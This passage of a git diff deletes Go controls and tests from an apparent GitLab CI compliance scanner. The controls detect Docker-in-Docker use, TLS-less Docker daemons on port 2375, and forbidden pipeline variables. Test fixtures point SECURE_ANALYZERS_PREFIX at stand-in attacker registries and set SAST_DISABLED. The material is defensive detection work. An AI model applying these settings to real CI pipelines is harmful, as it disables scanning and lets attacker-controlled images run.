- // Also check global variables
- globalVars, err := gitlab.ParseGlobalVariables(mergedConf)
- if err == nil {
- if result := checkInsecureVars(globalVars); result != "" {
- // Avoid duplicates if already found in job vars
- if len(findings) == 0 || findings[0] != result {
- findings = append(findings, result)
- }
- }
- }
-
- return strings.Join(findings, "; ")
-}
-
-// checkInsecureVars inspects a variable map for insecure Docker daemon settings.
-func checkInsecureVars(vars map[string]string) string {
- var parts []string
-
- for key, value := range vars {
- upperKey := strings.ToUpper(key)
- if upperKey == "DOCKER_TLS_CERTDIR" && strings.TrimSpace(value) == "" {
- parts = append(parts, "DOCKER_TLS_CERTDIR is empty (TLS disabled)")
- }
- if upperKey == "DOCKER_HOST" && strings.Contains(value, ":2375") {
- parts = append(parts, fmt.Sprintf("DOCKER_HOST uses non-TLS port 2375 (%s)", value))
- }
- }
-
- return strings.Join(parts, "; ")
-}
diff --git a/control/controlGitlabPipelineDockerInDocker_test.go b/control/controlGitlabPipelineDockerInDocker_test.go
deleted file mode 100644
index f89a401..0000000
--- a/control/controlGitlabPipelineDockerInDocker_test.go
+++ /dev/null
@@ -1,416 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataForDinD(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestDockerInDocker_Disabled(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: false,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestDockerInDocker_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestDockerInDocker_DindServiceDetected(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build-image": jobContent})
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, issue.Code)
- }
- if issue.JobName != "build-image" {
- t.Fatalf("expected job name 'build-image', got %s", issue.JobName)
- }
- if issue.ServiceImage != "docker:dind" {
- t.Fatalf("expected service image 'docker:dind', got %s", issue.ServiceImage)
- }
- if result.Metrics.DindServicesFound != 1 {
- t.Fatalf("expected DindServicesFound 1, got %d", result.Metrics.DindServicesFound)
- }
-}
-
-func TestDockerInDocker_VersionedDindTag(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:27.3.1-dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for versioned dind tag, got %d", len(result.Issues))
- }
- if result.Issues[0].ServiceImage != "docker:27.3.1-dind" {
- t.Fatalf("expected service image 'docker:27.3.1-dind', got %s", result.Issues[0].ServiceImage)
- }
-}
-
-func TestDockerInDocker_LatestTag(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:latest"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for docker:latest, got %d", len(result.Issues))
- }
-}
-
-func TestDockerInDocker_ServiceAsMap(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- svcMap := map[interface{}]interface{}{
- "name": "docker:27-dind",
- "alias": "docker",
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{svcMap},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for service map with dind, got %d", len(result.Issues))
- }
- if result.Issues[0].ServiceImage != "docker:27-dind" {
- t.Fatalf("expected service image 'docker:27-dind', got %s", result.Issues[0].ServiceImage)
- }
-}
-
-func TestDockerInDocker_NoDindService(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "services": []interface{}{"postgres:15"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"test": jobContent})
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 with no dind, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
-}
-
-func TestDockerInDocker_InsecureVarsWithoutDind(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "services": []interface{}{"postgres:15"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- "DOCKER_HOST": "tcp://docker:2375",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"test": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when insecure vars present but no dind service, got %d", len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
-}
-
-func TestDockerInDocker_DindWithInsecureJobVars(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- "DOCKER_HOST": "tcp://docker:2375",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- // Should have 2 issues: ISSUE-412 (dind usage) + ISSUE-413 (insecure daemon)
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (dind + insecure), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected first issue code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
- if result.Issues[1].Code != CodeDockerInDockerInsecure {
- t.Fatalf("expected second issue code %s, got %s", CodeDockerInDockerInsecure, result.Issues[1].Code)
- }
- if result.Issues[1].Detail == "" {
- t.Fatal("expected detail on insecure daemon issue")
- }
- if result.Metrics.DindServicesFound != 1 {
- t.Fatalf("expected DindServicesFound 1, got %d", result.Metrics.DindServicesFound)
- }
- if result.Metrics.InsecureDaemonFound != 1 {
- t.Fatalf("expected InsecureDaemonFound 1, got %d", result.Metrics.InsecureDaemonFound)
- }
-}
-
-func TestDockerInDocker_DindWithInsecureGlobalVars(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- globalVars := map[string]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- }
- data := buildOriginDataForDinD(globalVars, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (dind + insecure from global), got %d", len(result.Issues))
- }
- if result.Issues[1].Code != CodeDockerInDockerInsecure {
- t.Fatalf("expected second issue to be insecure daemon, got %s", result.Issues[1].Code)
- }
-}
-
-func TestDockerInDocker_DindSecureDaemonNoInsecureIssue(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "/certs",
- "DOCKER_HOST": "tcp://docker:2376",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- // Only dind usage issue, no insecure daemon issue
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (dind only, no insecure), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
-}
-
-func TestDockerInDocker_DetectInsecureDaemonDisabled(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- // Only dind usage, insecure daemon check skipped
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (detect insecure disabled), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
-}
-
-func TestDockerInDocker_MultipleJobs(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- job1 := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- job2 := map[interface{}]interface{}{
- "script": "echo test",
- "services": []interface{}{"postgres:15"},
- }
- job3 := map[interface{}]interface{}{
- "script": "docker push",
- "services": []interface{}{"docker:27-dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{
- "build": job1,
- "test": job2,
- "deploy": job3,
- })
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (two dind jobs), got %d", len(result.Issues))
- }
- if result.Metrics.DindServicesFound != 2 {
- t.Fatalf("expected DindServicesFound 2, got %d", result.Metrics.DindServicesFound)
- }
-}
-
-func TestDockerInDocker_NonDindDockerImage(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- // docker:27 without -dind suffix is just the Docker CLI, not DinD
- jobContent := map[interface{}]interface{}{
- "script": "docker version",
- "services": []interface{}{"docker:27"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"check": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues for docker:27 (not dind), got %d", len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
-}
-
-func TestIsDindImage(t *testing.T) {
- tests := []struct {
- image string
- expected bool
- }{
- {"docker:dind", true},
- {"docker:latest", true},
- {"docker:27-dind", true},
- {"docker:27.3.1-dind", true},
- {"docker:dind-rootless", true},
- {"docker:27-dind-rootless", true},
- {"docker:27", false},
- {"docker:27.3.1", false},
- {"docker", false},
- {"postgres:15", false},
- {"", false},
- {"registry.example.com/docker:dind", true},
- {"docker.io/library/docker:dind", true},
- }
-
- for _, tt := range tests {
- t.Run(tt.image, func(t *testing.T) {
- got := isDindImage(tt.image)
- if got != tt.expected {
- t.Fatalf("isDindImage(%q) = %v, want %v", tt.image, got, tt.expected)
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineJobVariablesOverride.go b/control/controlGitlabPipelineJobVariablesOverride.go
deleted file mode 100644
index 7f22d60..0000000
--- a/control/controlGitlabPipelineJobVariablesOverride.go
+++ /dev/null
@@ -1,217 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineJobVariablesOverrideVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineJobVariablesOverrideConf holds the configuration for job variable override detection
-type GitlabPipelineJobVariablesOverrideConf struct {
- Enabled bool `json:"enabled"`
- Variables []string `json:"variables"`
-}
-
-// GetConf loads configuration from PlumberConfig.
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineJobVariablesOverrideConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotOverrideJobVariablesConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotOverrideJobVariables control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotOverrideJobVariables.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.Variables = cfg.Variables
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "variables": p.Variables,
- }).Debug("pipelineMustNotOverrideJobVariables control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineJobVariablesOverrideMetrics holds metrics about variable override detection
-type GitlabPipelineJobVariablesOverrideMetrics struct {
- TotalVariablesChecked uint `json:"totalVariablesChecked"`
- OverriddenFound uint `json:"overriddenFound"`
-}
-
-// GitlabPipelineJobVariablesOverrideResult holds the result of the control
-type GitlabPipelineJobVariablesOverrideResult struct {
- Issues []GitlabPipelineJobVariablesOverrideIssue `json:"issues"`
- Metrics GitlabPipelineJobVariablesOverrideMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineJobVariablesOverrideIssue represents a variable that should not be defined in the CI config
-type GitlabPipelineJobVariablesOverrideIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- VariableName string `json:"variableName"`
- Value string `json:"value"`
- Location string `json:"location"` // "global" or job name
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the job variable override detection control.
-// It scans the raw (pre-merge) CI config so that only variables the user
-// actually wrote in .gitlab-ci.yml are checked. Variables injected by
-// included templates/components are ignored.
-func (p *GitlabPipelineJobVariablesOverrideConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineJobVariablesOverrideResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineJobVariablesOverride",
- "controlVersion": ControlTypeGitlabPipelineJobVariablesOverrideVersion,
- })
- l.Info("Start job variable override detection control")
-
- result := &GitlabPipelineJobVariablesOverrideResult{
- Issues: []GitlabPipelineJobVariablesOverrideIssue{},
- Metrics: GitlabPipelineJobVariablesOverrideMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineJobVariablesOverrideVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Job variable override detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.Variables) == 0 {
- l.Info("No variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- // Use the raw (pre-merge) config so we only see variables the user
- // actually wrote, not variables injected by included templates.
- rawConf := pipelineOriginData.Conf
- if rawConf == nil {
- l.Warn("Raw CI configuration not available, cannot check variables")
- result.Compliance = 0
- result.Error = "raw CI configuration not available"
- return result
- }
-
- // Build a set of variable names to detect (case-insensitive)
- varSet := make(map[string]bool, len(p.Variables))
- for _, v := range p.Variables {
- varSet[strings.ToUpper(v)] = true
- }
-
- // Check global variables
- globalVars, err := gitlab.ParseGlobalVariables(rawConf)
- if err != nil {
- l.WithError(err).Warn("Unable to parse global variables")
- } else {
- for key, value := range globalVars {
- result.Metrics.TotalVariablesChecked++
- if varSet[strings.ToUpper(key)] {
- result.Issues = append(result.Issues, GitlabPipelineJobVariablesOverrideIssue{
- Code: CodeJobVariableOverridden,
- DocURL: CodeJobVariableOverridden.DocURL(),
- VariableName: key,
- Value: value,
- Location: "global",
- })
- result.Metrics.OverriddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": "global",
- }).Debug("Overridden variable found in global variables")
- }
- }
- }
-
- // Check per-job variables (only jobs the user defined in .gitlab-ci.yml)
- for jobName, jobContent := range rawConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- jobVars, err := gitlab.ParseJobVariables(job)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job variables, skipping")
- continue
- }
-
- for key, value := range jobVars {
- result.Metrics.TotalVariablesChecked++
- if varSet[strings.ToUpper(key)] {
- result.Issues = append(result.Issues, GitlabPipelineJobVariablesOverrideIssue{
- Code: CodeJobVariableOverridden,
- DocURL: CodeJobVariableOverridden.DocURL(),
- VariableName: key,
- Value: value,
- Location: jobName,
- })
- result.Metrics.OverriddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": jobName,
- }).Debug("Overridden variable found in job variables")
- }
- }
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Overridden variables found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalChecked": result.Metrics.TotalVariablesChecked,
- "overriddenFound": result.Metrics.OverriddenFound,
- "compliance": result.Compliance,
- }).Info("Job variable override detection control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineJobVariablesOverride_test.go b/control/controlGitlabPipelineJobVariablesOverride_test.go
deleted file mode 100644
index 6dab5ac..0000000
--- a/control/controlGitlabPipelineJobVariablesOverride_test.go
+++ /dev/null
@@ -1,244 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataForVarOverride(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- rawConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- Conf: rawConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestJobVarOverride_Disabled(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: false,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestJobVarOverride_NoVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no variables configured")
- }
-}
-
-func TestJobVarOverride_NilRawConf(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := &collector.GitlabPipelineOriginData{
- Conf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when raw conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when raw conf unavailable")
- }
-}
-
-func TestJobVarOverride_GlobalVariable(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil-registry.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.VariableName != "SECURE_ANALYZERS_PREFIX" {
- t.Fatalf("expected variable SECURE_ANALYZERS_PREFIX, got %s", issue.VariableName)
- }
- if issue.Location != "global" {
- t.Fatalf("expected location 'global', got %s", issue.Location)
- }
- if issue.Code != CodeJobVariableOverridden {
- t.Fatalf("expected code %s, got %s", CodeJobVariableOverridden, issue.Code)
- }
- if result.Metrics.OverriddenFound != 1 {
- t.Fatalf("expected OverriddenFound 1, got %d", result.Metrics.OverriddenFound)
- }
-}
-
-func TestJobVarOverride_JobVariable(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo scanning",
- "variables": map[interface{}]interface{}{
- "SAST_DISABLED": "true",
- },
- }
- data := buildOriginDataForVarOverride(
- nil,
- map[string]interface{}{"sast-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Location != "sast-job" {
- t.Fatalf("expected location 'sast-job', got %s", result.Issues[0].Location)
- }
-}
-
-func TestJobVarOverride_MultipleGlobalAndJob(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX", "SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo test",
- "variables": map[interface{}]interface{}{
- "SAST_DISABLED": "true",
- },
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- map[string]interface{}{"scan-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.OverriddenFound != 2 {
- t.Fatalf("expected OverriddenFound 2, got %d", result.Metrics.OverriddenFound)
- }
-}
-
-func TestJobVarOverride_CaseInsensitive(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"secure_analyzers_prefix"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected case-insensitive match to find 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestJobVarOverride_NoMatches(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX", "SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "MY_SAFE_VAR": "hello",
- },
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SOME_VAR": "value"},
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
- if result.Metrics.TotalVariablesChecked < 2 {
- t.Fatalf("expected at least 2 variables checked, got %d", result.Metrics.TotalVariablesChecked)
- }
-}
-
-func TestJobVarOverride_AnyValueIsDetected(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SAST_DISABLED"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SAST_DISABLED": "false"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue even when value is 'false' (variable should not be defined at all), got %d", len(result.Issues))
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
-}
diff --git a/control/controlGitlabPipelineOriginHardcodedJobs.go b/control/controlGitlabPipelineOriginHardcodedJobs.go
deleted file mode 100644
index a60ed79..0000000
--- a/control/controlGitlabPipelineOriginHardcodedJobs.go
+++ /dev/null
@@ -1,147 +0,0 @@
-package control
-
-import (
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginHardcodedJobsVersion = "0.1.0"
-
-// GitlabPipelineHardcodedJobsConf holds the configuration for hardcoded job detection
-type GitlabPipelineHardcodedJobsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// Returns error if config is nil (but control can still be disabled)
-func (p *GitlabPipelineHardcodedJobsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- hardcodedConfig := plumberConfig.GetPipelineMustNotIncludeHardcodedJobsConfig()
- if hardcodedConfig == nil {
- // Control not configured - disable it
- p.Enabled = false
- return nil
- }
-
- // Apply configuration
- p.Enabled = hardcodedConfig.IsEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- }).Debug("pipelineMustNotIncludeHardcodedJobs control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabPipelineHardcodedJobsMetrics holds metrics about hardcoded jobs
-type GitlabPipelineHardcodedJobsMetrics struct {
- Total uint `json:"total"`
- HardcodedJobs uint `json:"hardcodedJobs"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineHardcodedJobsResult holds the result of the hardcoded jobs control
-type GitlabPipelineHardcodedJobsResult struct {
- Issues []GitlabPipelineHardcodedJobIssue `json:"issues"`
- Metrics GitlabPipelineHardcodedJobsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineHardcodedJobIssue represents an issue with a hardcoded job
-type GitlabPipelineHardcodedJobIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the hardcoded job detection control
-func (p *GitlabPipelineHardcodedJobsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineHardcodedJobsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineHardcodedJobs",
- "controlVersion": ControlTypeGitlabPipelineOriginHardcodedJobsVersion,
- })
- l.Info("Start hardcoded jobs control")
-
- result := &GitlabPipelineHardcodedJobsResult{
- Issues: []GitlabPipelineHardcodedJobIssue{},
- Metrics: GitlabPipelineHardcodedJobsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineOriginHardcodedJobsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
